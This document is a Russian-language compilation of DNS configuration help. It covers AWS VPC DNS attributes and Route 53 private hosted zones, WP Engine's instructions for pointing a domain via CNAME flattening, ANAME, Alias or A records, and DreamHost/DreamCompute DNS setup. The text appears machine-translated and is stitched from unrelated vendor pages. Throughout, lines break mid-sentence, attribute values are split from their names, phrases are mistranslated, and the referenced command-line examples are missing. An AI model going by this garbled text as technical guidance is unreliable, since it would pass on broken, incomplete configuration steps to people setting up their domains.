Резолвер Amazon Route 53 не может разрешить предоставленные Amazon частные имена хостов DNS.
- Экземпляры
получают настраиваемые частные имена хостов DNS, если есть настраиваемые доменное имя в опциях DHCP набор.Если вы не используете Amazon Route 53 Resolver server, ваши серверы доменных имен должны разрешать имя хоста как соответствующий.
Если вы используете пользовательские доменные имена DNS, определенные в частной зоне хостинга в Amazon Route 53 или используйте частный DNS с интерфейсными конечными точками VPC (AWS PrivateLink), вы должны установить как
, enableDnsHostnames, так и
.enableDnsSupport
атрибутовtrue
.Резолвер Amazon Route 53 может разрешать частные имена хостов DNS в частные адреса IPv4 для всех адресных пространств, включая адрес IPv4 диапазон вашего VPC выходит за пределы указанных диапазонов частных IPv4-адресов по RFC 1918.Тем не мение, если вы создали VPC до октября 2016 г., Amazon Route 53 Resolver не разрешает частные имена хостов DNS, если диапазон IPv4-адресов вашего VPC падает вне этих диапазонов. Чтобы включить поддержку для этого, обратитесь в службу поддержки AWS.
По умолчанию для обоих атрибутов установлено значение true
в VPC по умолчанию или в созданном VPC.
с помощью мастера VPC.По умолчанию установлен только атрибут enableDnsSupport
.
to true
в VPC, созданном любым другим способом. Чтобы проверить, включен ли ваш VPC для
об этих атрибутах см. в разделе Просмотр и обновление поддержки DNS для вашего VPC. Если вы включите имена хостов DNS и поддержку DNS в VPC, который ранее не поддерживал
их, экземпляр, который вы уже запустили в этом VPC, получает общедоступное имя хоста DNS
если
у него есть общедоступный IPv4-адрес или эластичный IP-адрес.
DNS-квоты
Каждый экземпляр EC2 ограничивает количество пакетов, которые могут быть отправлены на Amazon Route 53 Resolver (в частности, адрес .2, например 10.0.0.2 и 169.254.169.253) до 1024 пакетов в секунду на сеть интерфейс.Эту квоту нельзя увеличить. Количество DNS-запросов в секунду поддержка Amazon Route 53 Resolver зависит от типа запроса, размера ответ и используемый протокол. Для получения дополнительной информации и рекомендаций для масштабируемую архитектуру DNS см. в техническом документе «Решения гибридного облака DNS для Amazon VPC».
При достижении квоты Amazon Route 53 Resolver отклоняет трафик.Несколько из причины для достижение квоты может быть связано с проблемой регулирования DNS или с запросами метаданных экземпляра, которые использовать Сетевой интерфейс Amazon Route 53 Resolver. Для получения информации о том, как решить VPC DNS проблемы с регулированием, см. Как определить, не работают ли мои DNS-запросы к DNS-серверу, предоставленному Amazon. должное к регулированию DNS VPC.Инструкции по извлечению метаданных экземпляра см. В разделе Получение метаданные экземпляра в Руководстве пользователя Amazon EC2 для экземпляров Linux .
Просмотр имен хостов DNS для вашего экземпляра EC2
Вы можете просмотреть имена хостов DNS для запущенного экземпляра или сетевого интерфейса, используя то Консоль Amazon EC2 или командная строка.
Поля Public DNS (IPv4) и Private DNS являются доступен, когда параметры DNS включены для VPC, связанного с пример. Дополнительные сведения см. В разделе Поддержка DNS в вашем VPC.
Экземпляр
Для просмотра имен хостов DNS для экземпляра с помощью консоли
Откройте консоль Amazon EC2 на https: // console.aws.amazon.com/ec2/.
На панели навигации выберите Экземпляры .
Выберите свой экземпляр из списка.
На панели сведений Public DNS (IPv4) и Частный DNS Поля отображают имена хостов DNS, если применимый.
Для просмотра имен хостов DNS для экземпляра с помощью командной строки
Вы можете использовать одну из следующих команд.Для получения дополнительной информации об этой команде линейные интерфейсы, см. Доступ к Amazon VPC.
Сетевой интерфейс
Для просмотра частного имени хоста DNS для сетевого интерфейса с помощью консоли
Откройте консоль Amazon EC2 на https: // console.aws.amazon.com/ec2/.
На панели навигации выберите Сетевые интерфейсы .
Выберите сетевой интерфейс из списка.
На панели сведений в поле Private DNS (IPv4) отображается частное имя хоста DNS.
Для просмотра имен хостов DNS для сетевого интерфейса с помощью командной строки
Вы можете использовать одну из следующих команд.Для получения дополнительной информации об этой команде линейные интерфейсы, см. Доступ к Amazon VPC.
Просмотр и обновление поддержки DNS для вашего VPC
Вы можете просматривать и обновлять атрибуты поддержки DNS для вашего VPC с помощью Amazon VPC. приставка.
Для описания и обновления поддержки DNS для VPC с помощью консоли
Откройте консоль Amazon VPC на https://console.aws.amazon.com/vpc/.
На панели навигации выберите Ваши VPC .
Выберите VPC из списка.
Просмотрите информацию на вкладке Описание . В этом примере обе настройки включены.
Чтобы обновить эти настройки, выберите Действия или Изменить. Разрешение DNS или Редактировать имена хостов DNS .В диалоговом окне в открывшемся окне установите или снимите флажок, чтобы включить или выключить функцию, а затем выберите Сохранить изменения .
Для описания поддержки DNS для VPC с помощью командной строки
Вы можете использовать одну из следующих команд.Для получения дополнительной информации об этой команде линейные интерфейсы, см. Доступ к Amazon VPC.
Для обновления поддержки DNS для VPC с помощью командной строки
Вы можете использовать одну из следующих команд.Для получения дополнительной информации об этой команде линейные интерфейсы, см. Доступ к Amazon VPC.
Использование частных размещенных зон
Если вы хотите получить доступ к ресурсам в вашем VPC, используя собственные доменные имена DNS, например в виде пример.com вместо использования частных IPv4-адресов или частного DNS, предоставляемого AWS. имена хостов, вы можете создать частную размещенную зону в Route 53. Частная размещенная зона это контейнер, содержащий информацию о том, как вы хотите направлять трафик для домена а также его поддомены в одном или нескольких VPC, не открывая ваши ресурсы в Интернете.Затем вы можете создать наборы записей ресурсов Route 53, которые определяют реакцию Route 53. к запросы для вашего домена и поддоменов. Например, если вы хотите, чтобы запросы браузера для example.com для перенаправления на веб-сервер в вашем VPC, вы создадите запись A в ваш частная размещенная зона и укажите IP-адрес этого веб-сервера.Для дополнительной информации о создании частной размещенной зоны см. Работа с частной размещенной зоной. зоны в Руководстве разработчика по Amazon Route 53 .
Для доступа к ресурсам с использованием пользовательских доменных имен DNS вы должны быть подключены к экземпляру.
в вашем VPC. Из своего экземпляра вы можете проверить, что ваш ресурс в личном
принимал
зона доступна по ее настраиваемому DNS-имени с помощью команды ping
; для
Например, ping mywebserver.example.com
. (Вы должны убедиться, что ваш экземпляр
правила группы безопасности разрешают входящий ICMP-трафик для команды ping
, чтобы
Работа.)
Вы можете получить доступ к частной размещенной зоне из экземпляра EC2-Classic, который связан с ваш VPC с использованием ClassicLink при условии, что ваш VPC поддерживает поддержку ClassicLink DNS.Для дополнительную информацию см. в разделе Включение Поддержка ClassicLink DNS в Руководстве пользователя Amazon EC2 для экземпляров Linux . В противном случае частные размещенные зоны не поддерживают транзитивные отношения за пределами то VPC; например, вы не можете получить доступ к своим ресурсам, используя их собственный частный DNS имена с другой стороны VPN-соединения.Для получения дополнительной информации см. ClassicLink. ограничения в Руководстве пользователя Amazon EC2 для инстансов Linux .
Если вы используете собственные доменные имена DNS, определенные в частной зоне хостинга в Amazon Route 53,
атрибуты enableDnsHostnames
и enableDnsSupport
должны быть
установлено значение , истинное значение
.
точек DNS для WP Engine
Последний шаг к запуску вашего веб-сайта WordPress, управляемого WP Engine, — это обновление DNS. Это позволит трафику поступать с вашего домена на ваш сайт WordPress, размещенный на WP Engine. Этот процесс начинается с вашего DNS-менеджера, который чаще всего находится там, где вы купили домен.
Существует несколько способов указать DNS на WP Engine. Предпочтительным методом является сглаживание записей DNS, поскольку мы считаем, что это наиболее масштабируемое решение. Методы CNAME, ANAME, Alias и A record будут работать, чтобы указать DNS на WP Engine. Маскирование домена не поддерживается непосредственно в WP Engine, однако эту конфигурацию все же можно настроить с вашего DNS-хоста.
ПРИМЕЧАНИЕ : Перед изменением записей DNS выполните оставшиеся шаги «Начало работы»!
Значения записей DNS
Чтобы правильно настроить записи DNS, вам сначала понадобится значение IP или CNAME, на котором размещен ваш веб-сайт.
- Войдите в пользовательский портал
- Щелкните имя среды , для которого вы хотите найти IP и CNAME для
- Выберите Домены в левом меню
- На странице доменов прокрутите вниз. Ваши значения DNS могут быть расположены в разделе DNS Details .
- Запись A — это ваш IP-адрес
- Используется при указании DNS с помощью записи A.
- CNAME Запись — это ваш уникальный WP Engine CNAME, иногда называют «временным доменом»
- Запись A — это ваш IP-адрес
Значение CNAME WP Engine может варьироваться в зависимости от того, какой тип сети вы используете: базовая сеть, расширенная сети или Global Edge Security.
Оставьте эту страницу открытой для упрощения копирования при последующем указании DNS.
Должен ли я указывать DNS, используя IP-адрес или запись CNAME?
Как управляемый хост WordPress, WP Engine может перенести ваш сайт на другой сервер по запросу или в экстренных случаях. Хотя миграции происходят довольно редко, важно понимать, как эта возможность может повлиять на ваше спокойствие в будущем и настроить вас на успех. Поскольку WP Engine не является хостом DNS, при переносе вашего сайта задача обновления записей DNS ложится на вас или вашу команду.Однако есть способы предотвратить потребность в обновлении DNS позже.
Чтобы понять, как указывать DNS, вам нужно знать различные типы записей и почему они важны для веб-сайтов WP Engine.
Версия вашего домена без www (например, domain.com
) также называется вершиной или корневым доменом . Именно в этой конкретной версии вашего домена становятся актуальными различные конфигурации, которые мы описываем ниже. Домен www (пример: www.domain.com
) и любые поддомены (EX: blog.domain.com
) всегда можно указать с помощью CNAME, поэтому эти записи можно настроить так же, как и с любым другим хостом.
Если корневой домен указан с помощью записи A, он будет использовать статический IP-адрес (Пример: 123.456.78.90
). Думайте об этом IP-адресе как о почтовом адресе вашего сервера. Если ваш веб-сайт перемещается на новый сервер, информация может некоторое время пересылаться, но, скорее всего, будут проблемы с доставкой, пока вы снова не обновите свой IP-адрес на хосте DNS.
Если вы укажете корневой домен на серверы WP Engine гибким и нестатическим способом , то вместо IP-адреса вы будете использовать поддомен WP Engine (например, mycoolsite.wpengine.com
). Таким образом, вам не придется вносить изменения в DNS, если ваш сайт перейдет на другой сервер с нами, потому что мы контролируем адрес этого субдомена. Таким образом, гибкими считаются следующие методы: CNAME, ANAME и Alias.
Метод, который вы используете для указания своего DNS, в конечном итоге зависит от вас и того, что поддерживает ваш DNS-хост.Все четыре варианта DNS, которые мы здесь подробно описали, будут успешно направлять трафик на WP Engine. Хотя наша служба поддержки всегда рада помочь прояснить эти варианты в любое время, имейте в виду, что наши агенты не могут войти на ваш DNS-хост от вашего имени. Если вы не можете настроить DNS самостоятельно, обратитесь к своему DNS-узлу, указав тип записи, который вы хотите использовать, и значения записей DNS WP Engine.
Точка DNS с использованием выравнивания CNAME
Некоторые службы предлагают поддержку сглаживания CNAME, что означает, что ваш корневой домен (не www) может быть указан с помощью записи CNAME.Имейте в виду, что выравнивание CNAME — это , требуется для веб-сайтов, размещенных в кластерных серверных средах (AWS).
Сглаженные записиCNAME будут выглядеть следующим образом:
НАЗНАЧЕНИЕ | ТИП | НАЗВАНИЕ | ЦЕЛЬ / ИМЯ ХОСТА |
---|---|---|---|
Корневой (без www) | CNAME | @ или yourdomain.com | environment.wpengine.com |
www | CNAME | www | среда.wpengine.com |
Поддомен | CNAME | блог, магазин и т. Д. | environment.wpengine.com |
ПРИМЕЧАНИЕ : Если ваш веб-сайт находится в субдомене, таком как shop.mydomain.com
, для указания субдомена требуется только запись субдомена.
Cloudflare — это наша рекомендация для выравнивания CNAME, так как это значительно упрощает добавление дополнительных функций через Cloudflare в будущем. Следуя приведенным ниже инструкциям, вы сначала настроите свои записи CNAME в Cloudflare, а затем обновите серверы имен вашего домена, чтобы они указывали на Cloudflare от вашего регистратора доменных имен.
- Подпишитесь на план Cloudflare (здесь мы используем бесплатный план)
- Нажмите Добавить сайт и введите доменное имя
- Cloudflare обнаружит и отобразит любые существующие записи для вашего домена
- Удалите любые записи A, показанные для вашего корневого домена
- EX:
yourdomain.com
, он также может быть обозначен как@
и будет указывать на IP-адрес
- EX:
- В раскрывающемся списке Тип выберите
CNAME
- Установите имя на
@
- В поле Target введите CNAME вашего WP Engine
- Теперь найдите
www
в столбце имени :- Если эта запись имеет
@
, ваше доменное имя или домен WP Engine в столбце Content рядом с ним, вы можете оставить запись как есть. - Если эта запись имеет IP-адрес в столбце Content рядом с ней (например:
123.456.78.90
):- Удалить запись
www
- Нажмите Добавить запись
- Установите Введите в раскрывающемся списке
CNAME
- В поле Name введите
www
- В поле Target введите
@
- Нажмите Сохранить
- Удалить запись
- Если эта запись имеет
- У вас будет две записи похожие на этот пример:
- Щелкните Продолжить .
- Cloudflare отобразит от двух до четырех серверов имен. Все они должны быть точно скопированы в панель управления вашего регистратора DNS (там, где вы купили домен).
- На вашем DNS-хосте найдите область для редактирования ваших серверов имен. Часто это происходит в той же области, где вы управляете записями DNS. Возможно, вам потребуется выбрать параметр для установки «настраиваемых серверов имен».
- После того, как вы изменили серверов имен на те, которые показаны на панели Cloudflare, обязательно сохраните.
Вот и все! Вы можете отслеживать распространение ваших изменений DNS на таком сайте.Имейте в виду, что изменение настроек серверов имен и DNS может занять некоторое время. Это во многом зависит от самого вашего DNS-хоста, поэтому, если у вас есть проблемы с распространением, обратитесь к поставщику DNS, у которого вы приобрели домен и где вы указали серверы имен для Cloudflare.
ПРИМЕЧАНИЕ. Обновление серверов имен для вашего домена повлияет на на все связанные с ним записи , включая адреса электронной почты. Cloudflare делает все возможное, чтобы импортировать существующие записи, но убедитесь, что работаете с вашим почтовым хостом, убедитесь, что вы скопировали любые дополнительные записи DNS в Cloudflare.
Cloudflare предлагает множество дополнительных услуг и опций, поэтому не забудьте правильно их настроить. Узнайте больше о Cloudflare в нашем руководстве по передовой практике.
Точка DNS с использованием записи ANAME
Некоторые службы позволяют настроить корневой домен с помощью записи ANAME. Это очень похоже на запись ALIAS или CNAME в том смысле, что она может указывать на динамический адрес CNAME. Вы добавите запись ANAME для корневого домена и запись CNAME для www или любых поддоменов.
Записи, настроенные таким образом, будут выглядеть следующим образом:
НАЗНАЧЕНИЕ | ТИП | НАЗВАНИЕ | ЦЕЛЬ / ИМЯ ХОСТА |
---|---|---|---|
Корневой (без www) | ANAME | Оставить пустым | environment.wpengine.com |
www | ANAME | www | environment.wpengine.com |
Поддомен | ANAME | блог, магазин и т. Д. | environment.wpengine.com |
ПРИМЕЧАНИЕ : Если ваш веб-сайт находится в субдомене, например, blog.domain.com
или shop.mystore.com
, изменять корневую запись и записи WWW не требуется. Для указания субдомена требуется только запись субдомена.
В этом примере мы используем DNSMadeEasy.
- Войдите в DNSMadeEasy
- Выберите свой домен
- Щелкните Записи
- Найдите Записи ANAME Раздел
- Щелкните + , чтобы добавить новую запись ANAME
- Оставьте поле Имя пустым
- Введите CNAME вашего WP Engine в поле Имя
- Добавьте точку в конец CNAME:
- Установите TTL (время в секундах, чтобы изменения вступили в силу)
- Нажмите Отправить для сохранения
- Нажмите + еще раз, чтобы добавить еще одну запись ANAME
- Введите
www
в поле Имя - Введите CNAME вашего WP Engine в поле с надписью Имя
- Добавьте период в конец CNAME:
- Установить TTL (время в секундах для вступления изменений в силу)
- Нажмите Отправить t o save
Просмотрите полные инструкции от DNSMadeEasy.
Точка DNS с использованием записи псевдонима
Записи псевдонима работают так же, как записи ANAME и CNAME, в том смысле, что ваш корневой домен может указывать на динамический CNAME. Вы настроите свой корневой домен, используя запись псевдонима (которая обычно обозначается пустым именем записи, а не @), а также www или любые записи поддомена с использованием записи CNAME.
Записи, настроенные таким образом, будут выглядеть следующим образом:
НАЗНАЧЕНИЕ | ТИП | НАЗВАНИЕ | ЦЕЛЬ / ИМЯ ХОСТА |
---|---|---|---|
Корневой (без www) | Псевдоним | Оставить пустым | среда.wpengine.com |
www | CNAME | www | environment.wpengine.com |
Поддомен | Псевдоним | блог, магазин и т. Д. | environment.wpengine.com |
ПРИМЕЧАНИЕ : Если ваш веб-сайт находится в субдомене, например, blog.domain.com
или shop.mystore.com
, корректировка как корневой (не www
), так и www
записей не требуется. .Для указания субдомена требуется только запись субдомена.
В этом примере мы используем DNSimple.
- Войдите в DNSimple
- Нажмите Домены
- Выберите свое доменное имя
- Нажмите DNS
- Нажмите Добавить запись
- Выберите Псевдоним
- Оставьте Имя blank
- Задайте в поле Value свой WP Engine CNAME
- Выберите свой TTL (время в секундах, чтобы изменения вступили в силу)
- Нажмите Добавить запись для сохранения
- Нажмите Добавить запись еще раз , чтобы добавить вторую запись
- Выберите CNAME
- Введите
www
в поле Имя - Задайте значение поле для вашего WP Engine CNAME
- Нажмите Добавить запись , чтобы сохранить
См. Полные инструкции по настройке DNS на сайте DNSimple.
Точка DNS с использованием записи A
Указание вашей записи A на ваш статический IP-адрес WP Engine будет работать нормально, но вам нужно будет обновить свои записи DNS, если ваш веб-сайт когда-либо будет перенесен на новый сервер, пока ваш веб-сайт размещен у нас.
Записи, настроенные таким образом, будут выглядеть следующим образом:
НАЗНАЧЕНИЕ | ТИП | НАЗВАНИЕ | ЦЕЛЬ / ИМЯ ХОСТА |
---|---|---|---|
Корневой (без www) | А | @ или yourdomain.com | WP IP двигателя EX: 123.456.78.90 |
www | CNAME | www | @ |
Поддомен | CNAME | блог, магазин и т. Д. | environment.wpengine.com |
ПРИМЕЧАНИЕ : Если ваш веб-сайт находится в субдомене, например, blog.domain.com
или shop.mystore.com
, изменять корневую запись и записи WWW не требуется. Для указания субдомена требуется только запись субдомена.
После получения значения IP-адреса войдите на свой DNS-хост. Чаще всего это регистратор, у которого вы приобрели домен. Если вы не уверены, кто ваш DNS-хост, найдите свой домен на сайте WHOIs.
Мы создали отдельные руководства для наиболее распространенных хостов DNS:
Если ваш DNS-хост не указан выше, войдите в панель управления вашего DNS-хоста и найдите область для управления записями DNS. Ваши существующие записи будут выглядеть примерно так:
- Отредактируйте запись A с именем
@
и измените поле «Значение» на свой IP-адрес WP Engine. - Теперь проверьте запись «www»:
СЛЕДУЮЩИЙ ШАГ: Узнайте, как добавить SSL и защитить все страницы через HTTPS
Настройка DNS для ваших доменов — DreamHost Knowledge Base
Обзор
DNS — это технология, которая позволяет вашему домену указывать на определенный IP-адрес и позволяет серверу, который прослушивает его, размещать ваш домен. Есть несколько различных типов записей, но наиболее часто используемые:
- A — Используется для привязки домена или субдомена к IPv4-адресу.
- AAAA — используется для привязки домена или субдомена к IPv6-адресу.
- CNAME — используется для привязки домена или субдомена к другому домену или субдомену.
В большинстве случаев вам нужно использовать только записи A и AAAA.
Определение вашего общедоступного IP-адреса
Каждому экземпляру DreamCompute в кластере Восток США 2 назначается общедоступный IPv4- и IPv6-адрес.
Вы можете просмотреть эти адреса двумя способами:
Опция приборной панели DreamCompute
Параметры командной строки OpenStack
[user @ localhost] список серверов $ openstack + -------------------------------------- + --------- + -------- + ------------ + ------------- + -------------- ----------------------------------------------- + | ID | Имя | Статус | Состояние задачи | Состояние питания | Сети | + -------------------------------------- + --------- + -------- + ------------ + ------------- + -------------- ----------------------------------------------- + | 10a3b11b-dc2f-42a2-b5d8-84508a5156a5 | сайт | АКТИВНЫЙ | - | Бег | общественные = 208.113.128.37, 2607: f298: 5: 101d: f816: 3eff: fe79: 8c72 | + -------------------------------------- + --------- + -------- + ------------ + ------------- + -------------- ----------------------------------------------- +
Если у вас несколько экземпляров, у вас будет несколько общедоступных адресов IPv4 и IPv6. Вам нужно будет отслеживать, на каких адресах размещаются веб-сайты или другие службы.
Добавление IP-адресов к вашему домену в панели DreamHost
Для добавления нового IP-адреса:
- Установите для своего домена «Только DNS».Дополнительные сведения см. В статье «Настройка домена только для DNS».
- Убедитесь, что ваш домен уже размещен. См. Статью Добавление веб-сайта и хостинга для получения дополнительной информации о том, как добавить хостинг в домен.
- Создайте новую запись A для домена или поддомена. Дополнительные сведения см. В разделе «Добавление пользовательских записей DNS».
- Создайте дополнительные записи A по мере необходимости для доменов, которые вы хотите разместить на своем экземпляре. Вы также можете создать запись A для версии URL вашего сайта без www.Все, что вам нужно сделать, это оставить поле «Хост» пустым.
Ожидание распространения DNS
После того, как записи DNS сохранены, DNS должен распространиться, что может занять несколько часов. По умолчанию TTL (время жизни) для серверов имен DreamHost составляет 5 минут, поэтому любые изменения в ваших записях DNS должны быть обновлены почти во всем мире в течение этого времени.